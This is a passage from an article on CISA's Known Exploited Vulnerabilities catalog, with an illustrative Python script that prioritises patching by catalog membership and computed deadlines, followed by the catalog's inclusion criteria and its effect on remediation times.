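To show what feeding the catalog into a patch queue looks like in practice, here is an added example (not code from the article or from CISA) that ranks open findings by KEV membership first and CVSS second, and derives a remediation deadline from the 15-day and 25-day timelines the Directive sets for internet-facing and other systems. It assumes the feed's `vulnerabilities`, `cveID`, `vendorProject`, `product` and `dateAdded` field names; the feed entries, their dates, the placeholder CVE IDs and the host inventory are all constructed for illustration.

```python
import json
from datetime import date, timedelta
from typing import Dict, List

# Constructed feed in the shape of the KEV JSON (field names assumed; dates made up).
SAMPLE_KEV_FEED = """
{
  "title": "Known Exploited Vulnerabilities (constructed sample)",
  "vulnerabilities": [
    {"cveID": "CVE-2023-22515", "vendorProject": "Atlassian",
     "product": "Confluence Data Center and Server", "dateAdded": "2023-10-05"},
    {"cveID": "CVE-2023-20198", "vendorProject": "Cisco",
     "product": "IOS XE Web UI", "dateAdded": "2023-10-16"}
  ]
}
"""

# Constructed inventory of open findings. CVE-0000-000x are placeholders for
# findings with high CVSS scores that are not in the catalog.
SAMPLE_INVENTORY = [
    {"host": "wiki01", "cve": "CVE-2023-22515", "cvss": 10.0, "internet_facing": True},
    {"host": "edge-rtr-3", "cve": "CVE-2023-20198", "cvss": 10.0, "internet_facing": False},
    {"host": "build01", "cve": "CVE-0000-0001", "cvss": 9.8, "internet_facing": True},
    {"host": "hr-app", "cve": "CVE-0000-0002", "cvss": 7.5, "internet_facing": False},
]


def load_kev(feed_json: str) -> Dict[str, dict]:
    """Index a KEV-style feed by CVE ID for O(1) lookups."""
    feed = json.loads(feed_json)
    return {entry["cveID"]: entry for entry in feed["vulnerabilities"]}


def bod_deadline(date_added: date, internet_facing: bool) -> date:
    """Deadline per the Directive as quoted above: 15 days if internet-facing, else 25."""
    return date_added + timedelta(days=15 if internet_facing else 25)


def prioritize(inventory: List[dict], kev: Dict[str, dict], today: date) -> List[dict]:
    """Annotate findings with KEV status and deadline, then sort by urgency."""
    rows = []
    for item in inventory:
        row = dict(item)
        entry = kev.get(item["cve"])
        row["in_kev"] = entry is not None
        if entry is not None:
            added = date.fromisoformat(entry["dateAdded"])
            row["deadline"] = bod_deadline(added, item["internet_facing"])
            row["days_left"] = (row["deadline"] - today).days
        else:
            row["deadline"] = None
            row["days_left"] = None
        rows.append(row)
    # Catalog membership outranks CVSS; within the catalog the nearest deadline
    # comes first; remaining ties go to internet exposure and then raw CVSS.
    rows.sort(key=lambda r: (
        not r["in_kev"],
        r["days_left"] if r["days_left"] is not None else 10**6,
        not r["internet_facing"],
        -r["cvss"],
    ))
    return rows


if __name__ == "__main__":
    ranked = prioritize(SAMPLE_INVENTORY, load_kev(SAMPLE_KEV_FEED), date(2023, 10, 18))
    for r in ranked:
        flag = "KEV" if r["in_kev"] else "   "
        print(f"{flag} {r['host']:<12} {r['cve']:<15} cvss={r['cvss']:<4} "
              f"deadline={r['deadline']} days_left={r['days_left']}")
```

Note the ordering effect: a catalog entry with an older deadline outranks a non-catalog finding with an equal or higher CVSS score, which is exactly the shift in priority the catalog is meant to produce. The live feed also carries its own `dueDate` per entry, which is the figure federal agencies are held to; the computed deadline here is only a way to apply the same rule to your own exposure data.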

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. To be considered for the catalog, the first criterion a vulnerability has to meet is to have a unique CVE ID, so organizations can know precisely which vulnerability it concerns. This is not as straightforward as it may seem. CISA works with vendors, open-source projects, and the CVE program to ensure that every vulnerability that is exploited in the wild is properly identified with a CVE ID.

The second criterion is proof of active exploitation. This evidence needs to be from a credible source – a known industry partner, a trusted security researcher, or a government partner. Even then, sorting through vast amounts of data to distinguish genuine, malicious exploitation can prove to be a daunting task.

“We can find ourselves chasing whispers of exploitation in the wild that circulate online. Adding to the challenge is that some adversaries are elusive and sophisticated, leaving barely a trace of their digital footprints.”

And last but not least, an effective mitigation needs to be available. After all, it’s no use listing a vulnerability with a due date when there is no cure at hand.

It’s hard to find metrics to show what the effect of the KEV catalog is on malware infections and ransomware attacks, but what is clear is that the mean-time-to-remediate listed vulnerabilities was an average of nine days faster than for non-listed – and 36 days faster for internet-facing vulnerabilities.

CISA says it’s exploring options to add more informative fields, such as noting whether a specific vulnerability is being used by ransomware actors, which may be of particular use to sectors such as healthcare and education. It may help you further prioritize based on your threat model.
